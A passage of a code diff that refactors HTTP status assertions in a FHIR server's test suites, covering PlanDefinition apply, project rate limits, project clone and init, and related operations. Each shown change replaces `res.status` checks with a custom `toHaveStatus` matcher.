       .post(`/fhir/R4/PlanDefinition/${res2.body.id}/$apply`)
@@ -313,7 +313,7 @@ describe('PlanDefinition apply', () => {
       .send({
         resourceType: 'Patient',
       });
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
     expect((res4.body as OperationOutcome).issue?.[0]?.details?.text).toStrictEqual(
       "Expected at least 1 value(s) for required input parameter 'subject'"
     );
@@ -329,7 +329,7 @@ describe('PlanDefinition apply', () => {
         title: 'Example Plan Definition',
         status: 'active',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     const res4 = await request(app)
       .post(`/fhir/R4/PlanDefinition/${res2.body.id}/$apply`)
@@ -339,7 +339,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Parameters',
         parameter: [],
       });
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
     expect((res4.body as OperationOutcome).issue?.[0]?.details?.text).toStrictEqual(
       'Expected 1..* value(s) for input parameter subject, but 0 provided'
     );
@@ -360,7 +360,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     const res3 = await request(app)
       .post(`/fhir/R4/Patient`)
@@ -370,7 +370,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Workflow'], family: 'Demo' }],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     const res4 = await request(app)
       .post(`/fhir/R4/PlanDefinition/${res2.body.id}/$apply`)
@@ -385,7 +385,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
   });
 
   test('ActivityDefinition ServiceRequest', async () => {
@@ -432,7 +432,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     expect(res1.body.resourceType).toBe('ActivityDefinition');
 
     const res2 = await request(app)
@@ -451,7 +451,7 @@ describe('PlanDefinition apply', () => {
         ],
       });
 
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toBe('PlanDefinition');
     expect(res2.body.id).toBeDefined();
 
@@ -463,7 +463,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Workflow'], family: 'Demo' }],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     const res4 = await request(app)
       .post(`/fhir/R4/PlanDefinition/${res2.body.id}/$apply`)
@@ -479,26 +479,26 @@ describe('PlanDefinition apply', () => {
         ],
       });
 
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.resourceType).toBe('CarePlan');
     const carePlan = res4.body as WithId<CarePlan>;
 
     const res5 = await request(app)
       .get(`/fhir/R4/${carePlan.activity?.[0]?.reference?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     expect(res5.body.resourceType).toBe('RequestGroup');
 
     const res6 = await request(app)
       .get(`/fhir/R4/${(res5.body as RequestGroup).action?.[0]?.resource?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
 
     const resultTask = res6.body as Task;
     const res7 = await request(app)
       .get(`/fhir/R4/${resultTask.focus?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
     expect(res7.body.resourceType).toBe('ServiceRequest');
   });
 
@@ -512,7 +512,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Practitioner',
         name: [{ given: ['Dr. Jane'], family: 'Doe' }],
       });
-    expect(resPractitioner.status).toBe(201);
+    expect(resPractitioner).toHaveStatus(201);
     const practitioner = resPractitioner.body as WithId<Practitioner>;
 
     // 2. Create an ActivityDefinition with dynamicValue entries for performer and priority
@@ -539,7 +539,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(resActivityDefinition.status).toBe(201);
+    expect(resActivityDefinition).toHaveStatus(201);
 
     // 3. Create a PlanDefinition
     const resPlanDefinition = await request(app)
@@ -557,7 +557,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(resPlanDefinition.status).toBe(201);
+    expect(resPlanDefinition).toHaveStatus(201);
 
     // 4. Create a Patient
     const resPatient = await request(app)
@@ -568,7 +568,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Workflow'], family: 'Demo' }],
       });
-    expect(resPatient.status).toBe(201);
+    expect(resPatient).toHaveStatus(201);
 
     // 5. Apply with practitioner parameter
     const resApply = await request(app)
@@ -582,24 +582,24 @@ describe('PlanDefinition apply', () => {
           { name: 'practitioner', valueString: getReferenceString(practitioner) },
         ],
       });
-    expect(resApply.status).toBe(200);
+    expect(resApply).toHaveStatus(200);
     const carePlan = resApply.body as WithId<CarePlan>;
 
     // 6. Walk to the ServiceRequest
     const resRequestGroup = await request(app)
       .get(`/fhir/R4/${carePlan.activity?.[0]?.reference?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resRequestGroup.status).toBe(200);
+    expect(resRequestGroup).toHaveStatus(200);
 
     const resTask = await request(app)
       .get(`/fhir/R4/${(resRequestGroup.body as RequestGroup).action?.[0]?.resource?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resTask.status).toBe(200);
+    expect(resTask).toHaveStatus(200);
 
     const resServiceRequest = await request(app)
       .get(`/fhir/R4/${(resTask.body as Task).focus?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resServiceRequest.status).toBe(200);
+    expect(resServiceRequest).toHaveStatus(200);
 
     // 7. Verify dynamicValue entries were applied
     const serviceRequest = resServiceRequest.body as ServiceRequest;
@@ -618,7 +618,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Organization',
         name: 'Main Lab Organization',
       });
-    expect(resOrganization.status).toBe(201);
+    expect(resOrganization).toHaveStatus(201);
     const organization = resOrganization.body as WithId<Organization>;
     const organizationReference = getReferenceString(organization);
 
@@ -656,7 +656,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(resActivityDefinition.status).toBe(201);
+    expect(resActivityDefinition).toHaveStatus(201);
 
     // 3. Create a PlanDefinition
     const resPlanDefinition = await request(app)
@@ -674,7 +674,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(resPlanDefinition.status).toBe(201);
+    expect(resPlanDefinition).toHaveStatus(201);
 
     // 4. Create a Patient
     const resPatient = await request(app)
@@ -685,7 +685,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Workflow'], family: 'Demo' }],
       });
-    expect(resPatient.status).toBe(201);
+    expect(resPatient).toHaveStatus(201);
 
     // 5. Apply with only the subject — performer/category come from the ActivityDefinition itself
     const resApply = await request(app)
@@ -696,24 +696,24 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'subject', valueString: getReferenceString(resPatient.body as Patient) }],
       });
-    expect(resApply.status).toBe(200);
+    expect(resApply).toHaveStatus(200);
     const carePlan = resApply.body as WithId<CarePlan>;
 
     // 6. Walk to the ServiceRequest
     const resRequestGroup = await request(app)
       .get(`/fhir/R4/${carePlan.activity?.[0]?.reference?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resRequestGroup.status).toBe(200);
+    expect(resRequestGroup).toHaveStatus(200);
 
     const resTask = await request(app)
       .get(`/fhir/R4/${(resRequestGroup.body as RequestGroup).action?.[0]?.resource?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resTask.status).toBe(200);
+    expect(resTask).toHaveStatus(200);
 
     const resServiceRequest = await request(app)
       .get(`/fhir/R4/${(resTask.body as Task).focus?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resServiceRequest.status).toBe(200);
+    expect(resServiceRequest).toHaveStatus(200);
 
     // 7. Verify the hardcoded performer (organization) and category were applied
     const serviceRequest = resServiceRequest.body as ServiceRequest;
@@ -747,7 +747,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(resActivityDefinition.status).toBe(201);
+    expect(resActivityDefinition).toHaveStatus(201);
 
     const resPlanDefinition = await request(app)
       .post(`/fhir/R4/PlanDefinition`)
@@ -764,7 +764,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(resPlanDefinition.status).toBe(201);
+    expect(resPlanDefinition).toHaveStatus(201);
 
     const resPatient = await request(app)
       .post(`/fhir/R4/Patient`)
@@ -774,7 +774,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Workflow'], family: 'Demo' }],
       });
-    expect(resPatient.status).toBe(201);
+    expect(resPatient).toHaveStatus(201);
 
     const resApply = await request(app)
       .post(`/fhir/R4/PlanDefinition/${resPlanDefinition.body.id}/$apply`)
@@ -784,23 +784,23 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'subject', valueString: getReferenceString(resPatient.body as Patient) }],
       });
-    expect(resApply.status).toBe(200);
+    expect(resApply).toHaveStatus(200);
     const carePlan = resApply.body as WithId<CarePlan>;
 
     const resRequestGroup = await request(app)
       .get(`/fhir/R4/${carePlan.activity?.[0]?.reference?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resRequestGroup.status).toBe(200);
+    expect(resRequestGroup).toHaveStatus(200);
 
     const resTask = await request(app)
       .get(`/fhir/R4/${(resRequestGroup.body as RequestGroup).action?.[0]?.resource?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resTask.status).toBe(200);
+    expect(resTask).toHaveStatus(200);
 
     const resServiceRequest = await request(app)
       .get(`/fhir/R4/${(resTask.body as Task).focus?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resServiceRequest.status).toBe(200);
+    expect(resServiceRequest).toHaveStatus(200);
 
     const serviceRequest = resServiceRequest.body as ServiceRequest;
     expect(serviceRequest.asNeededBoolean).toBe(true);
@@ -842,7 +842,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(resActivityDefinition.status).toBe(201);
+    expect(resActivityDefinition).toHaveStatus(201);
 
     const resPlanDefinition = await request(app)
       .post(`/fhir/R4/PlanDefinition`)
@@ -859,7 +859,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(resPlanDefinition.status).toBe(201);
+    expect(resPlanDefinition).toHaveStatus(201);
 
     const resPatient = await request(app)
       .post(`/fhir/R4/Patient`)
@@ -869,7 +869,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Workflow'], family: 'Demo' }],
       });
-    expect(resPatient.status).toBe(201);
+    expect(resPatient).toHaveStatus(201);
 
     const resApply = await request(app)
       .post(`/fhir/R4/PlanDefinition/${resPlanDefinition.body.id}/$apply`)
@@ -879,23 +879,23 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'subject', valueString: getReferenceString(resPatient.body as Patient) }],
       });
-    expect(resApply.status).toBe(200);
+    expect(resApply).toHaveStatus(200);
     const carePlan = resApply.body as WithId<CarePlan>;
 
     const resRequestGroup = await request(app)
       .get(`/fhir/R4/${carePlan.activity?.[0]?.reference?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resRequestGroup.status).toBe(200);
+    expect(resRequestGroup).toHaveStatus(200);
 
     const resTask = await request(app)
       .get(`/fhir/R4/${(resRequestGroup.body as RequestGroup).action?.[0]?.resource?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resTask.status).toBe(200);
+    expect(resTask).toHaveStatus(200);
 
     const resServiceRequest = await request(app)
       .get(`/fhir/R4/${(resTask.body as Task).focus?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resServiceRequest.status).toBe(200);
+    expect(resServiceRequest).toHaveStatus(200);
 
     const serviceRequest = resServiceRequest.body as ServiceRequest;
     expect(serviceRequest.asNeededCodeableConcept).toMatchObject(asNeededReason);
@@ -923,7 +923,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(resActivityDefinition.status).toBe(201);
+    expect(resActivityDefinition).toHaveStatus(201);
 
     const resPlanDefinition = await request(app)
       .post(`/fhir/R4/PlanDefinition`)
@@ -940,7 +940,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(resPlanDefinition.status).toBe(201);
+    expect(resPlanDefinition).toHaveStatus(201);
 
     const resPatient = await request(app)
       .post(`/fhir/R4/Patient`)
@@ -950,7 +950,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Workflow'], family: 'Demo' }],
       });
-    expect(resPatient.status).toBe(201);
+    expect(resPatient).toHaveStatus(201);
 
     const resApply = await request(app)
       .post(`/fhir/R4/PlanDefinition/${resPlanDefinition.body.id}/$apply`)
@@ -960,7 +960,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'subject', valueString: getReferenceString(resPatient.body as Patient) }],
       });
-    expect(resApply.status).toBe(400);
+    expect(resApply).toHaveStatus(400);
     const outcome = resApply.body as OperationOutcome;
     expect(outcome.resourceType).toBe('OperationOutcome');
     expect(outcome.issue?.[0]?.details?.text).toContain('text/cql');
@@ -1027,7 +1027,7 @@ describe('PlanDefinition apply', () => {
         intent: 'order',
         priority: 'routine',
       });
-    expect(res1a.status).toBe(201);
+    expect(res1a).toHaveStatus(201);
 
     // 1b. Create a second ActivityDefinition with kind 'Task' to test task-elements extension works for non-ServiceRequest kinds
     const res1b = await request(app)
@@ -1071,7 +1071,7 @@ describe('PlanDefinition apply', () => {
         intent: 'order',
         priority: 'routine',
       });
-    expect(res1b.status).toBe(201);
+    expect(res1b).toHaveStatus(201);
 
     // 2. Create a PlanDefinition with both ActivityDefinitions
     const res2 = await request(app)
@@ -1093,7 +1093,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // 3. Create a Patient
     const res3 = await request(app)
@@ -1106,7 +1106,7 @@ describe('PlanDefinition apply', () => {
         gender: 'female',
         birthDate: '1990-01-01',
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     // 4. Create a Practitioner
     const res4 = await request(app)
@@ -1136,7 +1136,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res4.status).toBe(201);
+    expect(res4).toHaveStatus(201);
 
     // 5. Create an Organization
     const res5 = await request(app)
@@ -1164,7 +1164,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res5.status).toBe(201);
+    expect(res5).toHaveStatus(201);
 
     // 6. Create an Encounter
     const res6 = await request(app)
@@ -1198,7 +1198,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res6.status).toBe(201);
+    expect(res6).toHaveStatus(201);
 
     // 7. Apply the PlanDefinition with all parameters
     const res7 = await request(app)
@@ -1226,14 +1226,14 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
     expect(res7.body.resourceType).toStrictEqual('CarePlan');
     const carePlan = res7.body as CarePlan;
 
     const resRG = await request(app)
       .get(`/fhir/R4/${carePlan.activity?.[0]?.reference?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resRG.status).toBe(200);
+    expect(resRG).toHaveStatus(200);
     expect(resRG.body.resourceType).toBe('RequestGroup');
     const requestGroup = resRG.body as RequestGroup;
     expect(requestGroup.action).toHaveLength(2);
@@ -1246,7 +1246,7 @@ describe('PlanDefinition apply', () => {
     const res8a = await request(app)
       .get(`/fhir/R4/${taskRef1}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res8a.status).toBe(200);
+    expect(res8a).toHaveStatus(200);
     expect(res8a.body.resourceType).toStrictEqual('Task');
 
     const resultTask1 = res8a.body as Task;
@@ -1264,7 +1264,7 @@ describe('PlanDefinition apply', () => {
     const res8b = await request(app)
       .get(`/fhir/R4/${taskRef2}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res8b.status).toBe(200);
+    expect(res8b).toHaveStatus(200);
     expect(res8b.body.resourceType).toStrictEqual('Task');
 
     const resultTask2 = res8b.body as Task;
@@ -1283,7 +1283,7 @@ describe('PlanDefinition apply', () => {
     const res9 = await request(app)
       .get(`/fhir/R4/${serviceRequestRef}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res9.status).toBe(200);
+    expect(res9).toHaveStatus(200);
     expect(res9.body.resourceType).toBe('ServiceRequest');
     expect(res9.body.subject).toMatchObject(createReference(res3.body as Patient));
     expect(res9.body.encounter).toMatchObject(createReference(res6.body));
@@ -1292,7 +1292,7 @@ describe('PlanDefinition apply', () => {
     const res10 = await request(app)
       .get(`/fhir/R4/Encounter/${res6.body.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res10.status).toBe(200);
+    expect(res10).toHaveStatus(200);
   });
 
   test('Populates instantiates link when PlanDefinition has url', async () => {
@@ -1316,7 +1316,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // 2. Create a PlanDefinition
     const res2 = await request(app)
@@ -1335,7 +1335,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     const planDefinition = res2.body as PlanDefinition;
 
     // 3. Create a Patient
@@ -1347,7 +1347,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Workflow'], family: 'Demo' }],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     // 4. Apply the PlanDefinition to create the Task and RequestGroup
     const res4 = await request(app)
@@ -1363,7 +1363,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.resourceType).toStrictEqual('CarePlan');
     const carePlan = res4.body as WithId<CarePlan>;
     expect(carePlan.instantiatesCanonical).toStrictEqual([planDefinition.url]);
@@ -1372,7 +1372,7 @@ describe('PlanDefinition apply', () => {
     const res5 = await request(app)
       .get(`/fhir/R4/${carePlan.activity?.[0]?.reference?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     const requestGroup = res5.body as RequestGroup;
     expect(requestGroup.instantiatesCanonical).toStrictEqual([planDefinition.url]);
   });

--- a/packages/server/src/fhir/operations/project-rate-limits.test.ts
+++ b/packages/server/src/fhir/operations/project-rate-limits.test.ts
@@ -67,7 +67,7 @@ describe('Project $rate-limits operation', () => {
       .get(`/fhir/R4/Project/${admin.project.id}/$rate-limits`)
       .set('Authorization', `Bearer ${admin.accessToken}`);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const body = res.body as Parameters;
     expect(body.resourceType).toBe('Parameters');
 
@@ -100,7 +100,7 @@ describe('Project $rate-limits operation', () => {
       .get(`/fhir/R4/Project/${fresh.project.id}/$rate-limits`)
       .set('Authorization', `Bearer ${fresh.accessToken}`);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const body = res.body as Parameters;
     const membershipParams = getParametersByName(body, 'membership');
     // The $rate-limits call itself consumes quota (recordSearch), so the caller appears as an active consumer
@@ -112,7 +112,7 @@ describe('Project $rate-limits operation', () => {
       .get('/fhir/R4/ProjectMembership')
       .set('Authorization', `Bearer ${admin.accessToken}`)
       .set('X-Medplum', 'extended');
-    expect(membershipsRes.status).toBe(200);
+    expect(membershipsRes).toHaveStatus(200);
 
     const memberships = membershipsRes.body.entry.map((e: any) => e.resource) as ProjectMembership[];
     const targetId = memberships[0].id;
@@ -121,7 +121,7 @@ describe('Project $rate-limits operation', () => {
       .get(`/fhir/R4/Project/${admin.project.id}/$rate-limits?membershipId=${targetId}`)
       .set('Authorization', `Bearer ${admin.accessToken}`);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const body = res.body as Parameters;
     const membershipParams = getParametersByName(body, 'membership');
     expect(membershipParams).toHaveLength(1);
@@ -135,7 +135,7 @@ describe('Project $rate-limits operation', () => {
       .get('/fhir/R4/ProjectMembership')
       .set('Authorization', `Bearer ${admin.accessToken}`)
       .set('X-Medplum', 'extended');
-    expect(membershipsRes.status).toBe(200);
+    expect(membershipsRes).toHaveStatus(200);
 
     const memberships = membershipsRes.body.entry.map((e: any) => e.resource) as ProjectMembership[];
     const ids = memberships.slice(0, 2).map((m: ProjectMembership) => m.id);
@@ -144,7 +144,7 @@ describe('Project $rate-limits operation', () => {
       .get(`/fhir/R4/Project/${admin.project.id}/$rate-limits?membershipId=${ids[0]}&membershipId=${ids[1]}`)
       .set('Authorization', `Bearer ${admin.accessToken}`);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const body = res.body as Parameters;
     const membershipParams = getParametersByName(body, 'membership');
     expect(membershipParams).toHaveLength(2);
@@ -163,7 +163,7 @@ describe('Project $rate-limits operation', () => {
       .get(`/fhir/R4/Project/${admin.project.id}/$rate-limits`)
       .set('Authorization', `Bearer ${admin.accessToken}`);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const body = res.body as Parameters;
     expect(getParametersByName(body, 'project')).toHaveLength(1);
   });
@@ -175,7 +175,7 @@ describe('Project $rate-limits operation', () => {
       .get(`/fhir/R4/Project/${admin.project.id}/$rate-limits`)
       .set('Authorization', `Bearer ${nonAdmin.accessToken}`);
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Returns badRequest when a membership ID cannot be read', async () => {
@@ -183,7 +183,7 @@ describe('Project $rate-limits operation', () => {
       .get('/fhir/R4/ProjectMembership')
       .set('Authorization', `Bearer ${admin.accessToken}`)
       .set('X-Medplum', 'extended');
-    expect(membershipsRes.status).toBe(200);
+    expect(membershipsRes).toHaveStatus(200);
     const validId = (membershipsRes.body.entry[0].resource as ProjectMembership).id;
 
     const missingId = randomUUID();
@@ -191,7 +191,7 @@ describe('Project $rate-limits operation', () => {
       .get(`/fhir/R4/Project/${admin.project.id}/$rate-limits?membershipId=${validId}&membershipId=${missingId}`)
       .set('Authorization', `Bearer ${admin.accessToken}`);
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue?.[0]?.details?.text).toContain(missingId);
     expect(res.body.issue?.[0]?.details?.text).toContain('1 memberships');
   });
@@ -241,7 +241,7 @@ describe('Project $rate-limits operation', () => {
       .get(`/fhir/R4/Project/${admin.project.id}/$rate-limits?membershipId=${memberMembership.id}`)
       .set('Authorization', `Bearer ${admin.accessToken}`);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const body = res.body as Parameters;
     const membershipParams = getParametersByName(body, 'membership');
     expect(membershipParams).toHaveLength(1);

--- a/packages/server/src/fhir/operations/projectclone.test.ts
+++ b/packages/server/src/fhir/operations/projectclone.test.ts
@@ -59,7 +59,7 @@ describe('Project clone', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Success', async () => {
@@ -92,7 +92,7 @@ describe('Project clone', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({});
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const newProjectId = res.body.id;
     expect(newProjectId).toBeDefined();
@@ -135,7 +135,7 @@ describe('Project clone', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({ name: newProjectName });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const newProjectId = res.body.id;
     const newProject = await systemRepo.readResource<Project>('Project', newProjectId);
@@ -185,7 +185,7 @@ describe('Project clone', () => {
     const login = await globalSystemRepo.readResource<Login>('Login', res1.body.login);
     const user = await globalSystemRepo.readReference<User>(login.user as Reference<User>);
 
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     const { project } = await withTestContext(() => createProject('Test Project Name', user));
     const newProjectName = 'A New Name for a cloned project';
     expect(project).toBeDefined();
@@ -199,7 +199,7 @@ describe('Project clone', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({ name: newProjectName });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const systemRepo = await getProjectSystemRepo(project);
     const ClientApplicationBundle = await systemRepo.search({
@@ -231,7 +231,7 @@ describe('Project clone', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({ resourceTypes });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const newProjectId = res.body.id;
     const newProject = await systemRepo.readResource<Project>('Project', newProjectId);
@@ -268,7 +268,7 @@ describe('Project clone', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({ includeIds });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const newProjectId = res.body.id;
     const newProject = await systemRepo.readResource<Project>('Project', newProjectId);
@@ -305,7 +305,7 @@ describe('Project clone', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send({ excludeIds });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const newProjectId = res.body.id;
     const newProject = await systemRepo.readResource<Project>('Project', newProjectId);
@@ -362,7 +362,7 @@ describe('Project clone', () => {
         .set('Content-Type', ContentType.FHIR_JSON)
         .set('X-Medplum', 'extended')
         .send({});
-      expect(res.status).toBe(201);
+      expect(res).toHaveStatus(201);
 
       const newProjectId = res.body.id;
       expect(newProjectId).toBeDefined();

--- a/packages/server/src/fhir/operations/projectinit.test.ts
+++ b/packages/server/src/fhir/operations/projectinit.test.ts
@@ -69,7 +69,7 @@ describe('Project $init', () => {
           },
         ],
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const project = res.body as WithId<Project>;
     expect(project.id).toBeDefined();
@@ -147,7 +147,7 @@ describe('Project $init', () => {
           },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Requires owner to be User', async () => {
@@ -177,7 +177,7 @@ describe('Project $init', () => {
           },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Requires server User', async () => {
@@ -210,7 +210,7 @@ describe('Project $init', () => {
           },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Looks up existing user by email', async () => {
@@ -243,7 +243,7 @@ describe('Project $init', () => {
           },
         ],
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const project = res.body as Project;
     expect(project.owner).toStrictEqual(createReference(owner));
@@ -273,7 +273,7 @@ describe('Project $init', () => {
           },
         ],
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
   });
 
   test('Defaults to no owner if unspecified', async () => {
@@ -294,7 +294,7 @@ describe('Project $init', () => {
           },
         ],
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     const project = res.body as Project;
     expect(project.owner).toBeUndefined();
   });
@@ -319,7 +319,7 @@ describe('Project $init', () => {
           },
         ],
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     const project = res.body as Project;
     expect(project.owner).toBeUndefined();
     expect(project.systemSetting).toStrictEqual(config.defaultProjectSystemSetting);

--- a/packages/server/src/fhir/operations/rebuild-base-definitions.test.ts
+++ b/packages/server/src/fhir/operations/rebuild-base-definitions.test.ts
@@ -78,7 +78,7 @@ describe('$rebuild-base-definitions', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'resourceType', valueCode: 'SearchParameter' }],
       } satisfies Parameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const updatedParam = await repo.searchOne({
       resourceType: 'SearchParameter',
@@ -104,7 +104,7 @@ describe('$rebuild-base-definitions', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'resourceType', valueCode: 'StructureDefinition' }],
       } satisfies Parameters);
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
     expect(vi.mocked(defs).readJsonAsync).toHaveBeenCalledTimes(0);
   });
 });

--- a/packages/server/src/fhir/operations/refresh-reference-display.test.ts
+++ b/packages/server/src/fhir/operations/refresh-reference-display.test.ts
@@ -82,7 +82,7 @@ describe('$refresh-reference-display', () => {
         .auth(accessToken, { type: 'bearer' })
         .set('X-Medplum', 'extended')
         .send();
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       const updated = res.body as Observation;
 
       expect(updated.meta?.author?.display).toBe('Client!');
@@ -123,7 +123,7 @@ describe('$refresh-reference-display', () => {
         .auth(accessToken, { type: 'bearer' })
         .set('X-Medplum', 'extended')
         .send();
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       const updated = res.body as Observation;
 
       expect(updated.subject?.display).toBe('Test Patient Jones-Smith');

--- a/packages/server/src/fhir/operations/rescope.test.ts
+++ b/packages/server/src/fhir/operations/rescope.test.ts
@@ -73,7 +73,7 @@ describe('User/$rescope', () => {
